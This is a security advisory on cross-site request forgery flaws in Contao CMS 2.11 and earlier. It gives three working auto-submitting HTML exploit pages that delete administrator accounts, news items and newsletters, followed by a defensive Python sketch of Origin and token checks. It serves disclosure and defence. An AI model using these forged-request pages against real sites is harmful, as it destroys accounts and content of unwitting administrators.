Title: ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin-Delete Article)
By Ivano Binetti (http://ivanobinetti.com)
Download: http://www.contao.org/en/download.html
Vendor Website: http://www.contao.org
Affected Versions: 2.11.0 (latest) and earlier
Test Platform: Debian Squeeze (6.0)
+---------------------------------------- [Multiple vulnerabilities by Ivano Binetti] ---------------------------------------------+
Summary
1) Product Introduction
2) Vulnerability Description
   2.1 Delete an administrator or user
   2.2 Delete news
   2.3 Delete a newsletter
+------------------------------------------------------------------------------------------------------------------------------+
1) Product Introduction
Contao (fka TYPOlight) is "an open source content management system (CMS) for people who want a professional internet presence that
is easy to maintain".
2) Vulnerability Description
Contao 2.11 (and lower) is affected by a CSRF vulnerability which allows an attacker to delete admins/users and to delete web content
(articles, news, newsletters and so on) by luring an authenticated backend user onto a page that auto-submits a forged request.
2.1 Delete an administrator or user
<html>
<body onload="javascript:document.forms[0].submit()">
<h2>CSRF Exploit to delete ADMIN/USER account</h2>
<form method="POST" name="form0" action="http://www.2cto.com/contao/main.php?do=user&act=delete&id=2">
</form>
</body>
</html>
Note that it is possible to delete any admin/user, including the first administrator (id=1) created during Contao's installation.
2.2 Delete news
<html>
<body onload="javascript:document.forms[0].submit()">
<h2>CSRF Exploit to delete news</h2>
<form method="POST" name="form0" action="http://www.2cto.com/contao/main.php?do=news&act=delete&id=1">
</form>
</body>
</html>
2.3 Delete a newsletter
<html>
<body onload="javascript:document.forms[0].submit()">
<h2>CSRF Exploit to delete newsletter</h2>
<form method="POST" name="form0" action="http://www.2cto.com/contao/main.php?do=newsletter&act=delete&id=1">
</form>
</body>
</html>
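The three pages above all work the same way: the victim's browser attaches the Contao session cookie to a POST the victim never intended, and the backend accepts it because nothing in the request proves it originated from the CMS's own UI. As an added illustration from the defender's side (this is not code from the advisory or from Contao), the following Python sketch shows the two checks a backend controller should apply before honouring any request whose `act` parameter changes state: an Origin/Referer comparison and a per-session synchronizer token carried in a hidden form field. The host names cms.example and attacker.example, the session ids, the field name `csrf_token` and the `SESSIONS` dictionary are all constructed for the example; the query-string layout (`do=...&act=delete&id=...`) is the one the advisory shows. The check generalizes beyond `act=delete` to any act listed in `STATE_CHANGING_ACTS`.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed session store: session id -> CSRF token bound to that session.
SESSIONS = {}

# Origin of the CMS itself (constructed placeholder host).
SITE_ORIGIN = "http://cms.example"

# Any of these acts modifies data and therefore needs CSRF protection,
# regardless of whether the parameters arrive via GET or POST.
STATE_CHANGING_ACTS = {"delete", "edit", "create", "toggle"}


def issue_token(session_id):
    """Mint a fresh random token for one session. The backend embeds it in
    every form as a hidden field, so a page on another site cannot know it."""
    token = secrets.token_hex(16)
    SESSIONS[session_id] = token
    return token


def is_state_changing(url):
    """True when the request's act parameter is one that changes server state."""
    qs = parse_qs(urlsplit(url).query)
    return qs.get("act", [""])[0] in STATE_CHANGING_ACTS


def csrf_check(request, site_origin=SITE_ORIGIN):
    """Decide whether a request may proceed.

    request is a dict with keys: url (str), headers (dict), session_id (str),
    form (dict of submitted fields). Returns (allowed, reason).
    """
    if not is_state_changing(request["url"]):
        return True, "read-only request, no token required"

    # Check 1: if the browser tells us where the request came from, it must be
    # our own origin. A form auto-submitted from attacker.example carries that
    # page's Origin (or Referer), not the CMS's. A missing header is tolerated
    # here because some proxies strip Referer; the token check below is the
    # primary control and still applies.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if source is not None:
        src = urlsplit(source)
        site = urlsplit(site_origin)
        if (src.scheme, src.netloc) != (site.scheme, site.netloc):
            return False, f"cross-origin request from {src.scheme}://{src.netloc}"

    # Check 2: the hidden synchronizer token must match the one bound to the
    # session that the cookie identifies. compare_digest avoids timing leaks.
    expected = SESSIONS.get(request["session_id"])
    supplied = request["form"].get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid csrf_token for this session"

    return True, "ok"


def demo():
    """Run the check over a constructed set of requests; returns their verdicts."""
    token = issue_token("sess-admin")
    delete_url = f"{SITE_ORIGIN}/contao/main.php?do=user&act=delete&id=2"
    cases = {
        # The advisory's pattern: cookie present, no token, foreign Origin.
        "forged_cross_site": {
            "url": delete_url,
            "headers": {"Origin": "http://attacker.example"},
            "session_id": "sess-admin",
            "form": {},
        },
        # Same origin but the token was not sent (e.g. a stale or hand-built form).
        "same_origin_no_token": {
            "url": delete_url,
            "headers": {"Origin": SITE_ORIGIN},
            "session_id": "sess-admin",
            "form": {},
        },
        # The legitimate backend form: same origin and the session's token.
        "legitimate": {
            "url": delete_url,
            "headers": {"Origin": SITE_ORIGIN},
            "session_id": "sess-admin",
            "form": {"csrf_token": token},
        },
        # Listing users changes nothing, so it needs no token.
        "read_only": {
            "url": f"{SITE_ORIGIN}/contao/main.php?do=user",
            "headers": {},
            "session_id": "sess-admin",
            "form": {},
        },
    }
    return {name: csrf_check(req)[0] for name, req in cases.items()}


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name:22s} -> {'allowed' if allowed else 'rejected'}")
```

The token check is what actually closes the hole; the Origin comparison is defence in depth that also gives a clear log line when a forged request is attempted. Because the vulnerable endpoints in the advisory accept the action from query-string parameters, the check keys on `act` rather than on the HTTP method, so a GET-based variant of the same forgery is rejected too.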